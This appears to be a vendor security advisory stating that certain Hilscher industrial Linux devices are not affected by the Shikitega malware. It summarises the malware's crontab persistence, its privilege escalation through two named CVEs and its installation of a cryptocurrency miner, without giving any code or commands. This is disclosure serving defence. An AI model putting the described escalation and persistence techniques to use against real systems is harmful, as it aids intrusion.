2022-09-12 Shikitega Linux Malware Exploit

Owned by Armin Beck
2022-09-12
2 min read
TitleShikitega Linux Malware Exploit
Reporter

https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux

Hilscher Ticket

-

Affectsnot affected
Not affected

NIOT-E-TIJCX-GB-RE
NIOT-E-TPI51-EN-RE
NIOT-E-NPI3-EN
NIOT-E-NPI3-51-EN-RE
NIOT-E-NPI3-EN
NFS-M8-QM-D2-N16
NFX8M-D2-N32-010

ImpactNone
CVSS0
Severity

NONE 

Last modified

 

Note that the change history of the security advisory shall not be visible. All versions except the most current version shall be deleted whenever the security advisory is updated.

General Vulnerability Description

Short Description

At AT&T Alien Labs researchers have discovered a new stealthy Linux malware called Shikitega that can infect Linux systems in a stealthy manner. With additional payloads, the primary target of this Linux malware is the Linux-based systems and IoT devices. 

Detailed Description

In addition to exploiting vulnerabilities, the malware adds persistence to the host through crontab by exploiting exploits to elevate privileges. Later a cryptocurrency miner is installed on an infected device as a result of the infection. Shikitega exploits CVE-2021-4034 and CVE-2021-3493 for privilege escalation. Successful exploitation of the vulnerability an attacker with local network access to gain elevated privileges

Corrective Action or Resolution

Hilscher Linux based devices are not affected by Shikitega vulnerability.

CVE-2021-3493 is Ubuntu specific and not included in Hilscher's YOCTO project based custom Linux "netFIELD OS"

A patch for CVE-2021-4034 will be getting included in netFIELD OS version 2.4.x.x and higher. But there is anyway no attack vector in "netFIELD OS" in versions smaller than  2.4.x.x. 

Workaround

No action needed

Disclaimer

The security advisory and information contained herein, are provided on an "as is" basis and do not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. The information in this advisory should not be construed as a commitment by Hilscher. In no event shall Hilscher be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, nor shall Hilscher be liable for incidental or consequential damages arising from use of any software or hardware described in this advisory.
Hilscher provides no warranty, express or implied, for the information contained in this document, and assumes no responsibility for the information contained in this document or for any errors that may appear in this document. Your use of the advisory and information contained herein, or materials linked from the advisory, is at your own risk.  Information in this advisory and any related communications is based on our knowledge at the time of publication and is subject to change without notice. Hilscher reserves the right to change or update advisories at any time.